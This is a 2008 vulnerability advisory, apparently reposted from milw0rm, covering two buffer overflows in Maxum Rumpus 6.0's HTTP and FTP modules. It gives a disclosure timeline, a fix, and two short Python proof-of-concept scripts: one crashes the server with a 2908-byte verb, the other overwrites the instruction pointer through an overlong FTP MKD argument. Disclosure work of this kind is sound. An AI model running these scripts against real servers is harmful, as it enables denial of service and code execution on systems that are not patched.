116 lines
No EOL
3.6 KiB
Text
116 lines
No EOL
3.6 KiB
Text
BLUE MOON SECURITY ADVISORY 2008-09
|
|
===================================
|
|
|
|
|
|
:Title: Two buffer overflows in Maxum Rumpus
|
|
:Severity: Critical
|
|
:Reporter: Blue Moon Consulting
|
|
:Products: Maxum Rumpus v6.0
|
|
:Fixed in: 6.0.1
|
|
|
|
|
|
Description
|
|
-----------
|
|
|
|
Rumpus turns any Mac into a file transfer server.
|
|
|
|
Rumpus v6.0 contains two buffer overflow vulnerabilities in its HTTP and FTP modules.
|
|
The first allows an unauthenticated user to crash Rumpus. The later may result in arbitrary
|
|
code execution under superuser privilege.
|
|
|
|
The overflow in HTTP component is caused by the lack of boundary check when parsing for HTTP
|
|
action verb (GET, POST, PUT, etc.). If the verb is exactly 2908-byte long, the server runs into
|
|
a segmentation fault and crashes. A manual restart is required. It has been observed that this
|
|
problem occurs at other verb lengths too. The vulnerability is rated at moderate severity for the
|
|
lost of service.
|
|
|
|
The overflow in FTP component is also caused by the lack of length check when parsing FTP commands
|
|
that take argument such as ``MKD``, ``XMKD``, ``RMD`` and so on. The overflow occurs when the argument
|
|
is ``strcpy`` to an internal buffer. This buffer is 1024-byte long. When the passed-in argument is
|
|
longer than 1046 bytes, the instruction pointer will be overwritten. This allows a successful attack
|
|
to run arbitrary code under the privilege of a superuser (root) by default. Though authorization is
|
|
required to exploit this security bug, the vulnerability is rated at critical severity because the FTP
|
|
daemon could be allowing anonymous access.
|
|
|
|
Workaround
|
|
----------
|
|
|
|
There is no workaround the first bug.
|
|
|
|
Disable ANONYMOUS and only allow trusted users to use FTP.
|
|
|
|
Fix
|
|
---
|
|
|
|
Maxum has released Rumpus v6.0.1 which addressed these bugs.
|
|
|
|
Disclosure
|
|
----------
|
|
|
|
Blue Moon Consulting adapts `RFPolicy v2.0 <http://www.wiretrip.net/rfp/policy.html>`_ in notifying vendors.
|
|
|
|
:Initial vendor contact:
|
|
|
|
November 28, 2008: Initial contact sent to support@maxum.com
|
|
|
|
:Vendor response:
|
|
|
|
November 28, 2008: John requested further communications to be sent to the same address.
|
|
|
|
:Further communication:
|
|
|
|
November 28, 2008: Technical details and request for regular update of a patch sent to the vendor.
|
|
|
|
November 29, 2008: Vendor thanked for the bug report and planned to release v6.0.1 on Monday, December 01.
|
|
|
|
December 01, 2008: Vendor released 6.0.1 and posted release note at http://www.maxum.com/Rumpus/News601.html.
|
|
|
|
:Public disclosure: December 01, 2008
|
|
|
|
:Exploit code:
|
|
|
|
For the vulnerability in HTTP component::
|
|
|
|
from socket import socket, AF_INET, SOCK_STREAM
|
|
|
|
host = "192.168.1.12"
|
|
port = 80
|
|
|
|
s = socket(AF_INET, SOCK_STREAM)
|
|
s.connect((host, port))
|
|
s.send('z' * 2908 + '\n\n')
|
|
s.recv(1024)
|
|
s.close()
|
|
|
|
For the vulnerability in FTP component::
|
|
|
|
from socket import socket, AF_INET, SOCK_STREAM
|
|
|
|
host = "192.168.1.12"
|
|
port = 21
|
|
user = "regular"
|
|
pass_ = "training"
|
|
|
|
commands = [
|
|
'user regular\n',
|
|
'pass training\n',
|
|
'mkd ' + 'z' * 1046 + 'abcd\n'
|
|
]
|
|
|
|
s = socket(AF_INET, SOCK_STREAM)
|
|
s.connect((host, port))
|
|
s.recv(1024)
|
|
for line in commands:
|
|
s.send(line)
|
|
s.recv(1024)
|
|
s.close()
|
|
|
|
Disclaimer
|
|
----------
|
|
|
|
The information provided in this advisory is provided "as is" without warranty of any kind. Blue Moon Consulting Co., Ltd
|
|
disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular
|
|
purpose. Your use of the information on the advisory or materials linked from the advisory is at your own risk. Blue Moon Consulting Co., Ltd
|
|
reserves the right to change or update this notice at any time.
|
|
|
|
# milw0rm.com [2008-12-01] |